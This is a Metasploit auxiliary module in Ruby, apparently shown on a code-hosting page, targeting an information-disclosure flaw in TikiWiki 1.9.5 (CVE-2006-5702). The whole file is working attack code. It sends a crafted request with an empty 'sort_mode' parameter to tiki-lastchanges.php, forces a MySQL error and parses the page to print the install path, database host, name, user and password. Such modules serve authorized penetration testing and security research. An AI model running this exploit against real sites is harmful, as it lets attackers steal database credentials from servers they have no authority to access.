Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8

9
  def initialize(info = {})
10
    super(update_info(info,
11
      'Name'           => 'TikiWiki Information Disclosure',
12
      'Description'    => %q{
13
          A vulnerability has been reported in Tikiwiki, which can be exploited by
14
        an anonymous user to dump the MySQL user & passwd just by creating a mysql
15
        error with the "sort_mode" var.
16

17
        The vulnerability was reported in Tikiwiki version 1.9.5.
18
      },
19
      'Author'         => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
20
      'License'        => MSF_LICENSE,
21
      'References'     =>
22
        [
23
          ['OSVDB', '30172'],
24
          ['BID', '20858'],
25
          ['CVE', '2006-5702'],
26
          ['URL', 'https://web.archive.org/web/20080211225557/http://secunia.com/advisories/22678/'],
27
        ],
28
      'DisclosureDate' => '2006-11-01',
29
      'Actions'        =>
30
        [
31
          ['Dump', 'Description' => 'Dump user and password']
32
        ],
33
      'DefaultAction'  => 'Dump'
34
      ))
35

36
    register_options(
37
      [
38
        OptString.new('URI', [true, "TikiWiki directory path", "/tikiwiki"]),
39
      ])
40
  end
41

42
  def run
43
    print_status("Establishing a connection to the target...")
44

45
    uri = normalize_uri(datastore['URI'], '/tiki-lastchanges.php')
46
    rpath = uri + "?days=1&offset=0&sort_mode="
47

48
    res = send_request_raw({
49
      'uri'     => rpath,
50
      'method'  => 'GET',
51
      'headers' =>
52
      {
53
        'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
54
        'Connection' => 'Close',
55
      }
56
    }, 25)
57

58
    if (res and res.message == "OK")
59
      print_status("Get information about database...")
60

61
      n = 0
62
      c = 0
63

64
      # puts "body is #{res.body.length} bytes"
65
      infos = res.body.split(/\r?\n/)
66
      infos.each do |row|
67
        # puts row.inspect
68
        if (c < 6)
69
          if (row.match(/\["file"\]=>/))
70
            c+=1
71
            x = n + 1
72
            y = infos[x].match(/string\(\d+\) "(.*)"/m)
73
            print_status("Install path : #{y[1]}")
74
          end
75
          if (row.match(/\["databaseType"\]=>/))
76
            c+=1
77
            x = n + 1
78
            y = infos[x].match(/string\(\d+\) "(.*)"/m)
79
            print_status("DB type      : #{y[1]}")
80
          end
81
          if (row.match(/\["database"\]=>/))
82
            c+=1
83
            x = n + 1
84
            y = infos[x].match(/string\(\d+\) "(.*)"/m)
85
            print_status("DB name      : #{y[1]}")
86
          end
87
          if (row.match(/\["host"\]=>/))
88
            c+=1
89
            x = n + 1
90
            y = infos[x].match(/string\(\d+\) "(.*)"/m)
91
            print_status("DB host      : #{y[1]}")
92
          end
93
          if (row.match(/\["user"\]=>/))
94
            c+=1
95
            x = n + 1
96
            y = infos[x].match(/string\(\d+\) "(.*)"/m)
97
            print_status("DB user      : #{y[1]}")
98
          end
99
          if (row.match(/\["password"\]=>/))
100
            c+=1
101
            x = n + 1
102
            y = infos[x].match(/string\(\d+\) "(.*)"/m)
103
            print_status("DB password  : #{y[1]}")
104
          end
105
          n+=1
106
        end
107
      end
108

109
      if (c == 0)
110
        print_status("Could not obtain information about database.")
111
      end
112

113
    else
114
      print_status("No response from the server.")
115
    end
116
  end
117
end
118

119